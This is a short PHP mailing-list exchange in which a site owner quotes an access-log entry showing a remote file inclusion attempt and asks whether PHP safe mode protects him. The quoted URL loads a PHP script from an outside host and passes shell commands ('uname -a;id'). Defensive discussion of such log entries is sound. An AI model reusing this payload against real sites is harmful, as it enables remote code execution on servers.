-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
on index.php, are you including directly the file passed by content?
if you are vulnerable, the autor of your index.php is the one to blame, not php hehe
if safe mode is on, you may be immune to this asu.txt, but dont relly on it against everything else that can be done
BiŽ?řáÎë?ërĎčĘ wrote:
Hello,
I found very interesting messages in my access log:
http://www.cvok.cz/index.php?content=http://linkhacker.info/ilalang23/asu.txt?&cmd=uname%20-a;id;
It looks as trying of hack. Am I immune, if I have safe mod (because asu.txt is php script, which runs function system()).
thanks
Radek
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFAMAfuaxdA/5C8vH8RAq1hAKDBlEeAf9Rt/pMos6ZAc6UMuYfr4gCeIbko 6wiEccMHlqv/Q0L+nPwUiNM= =/+FK -----END PGP SIGNATURE-----
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php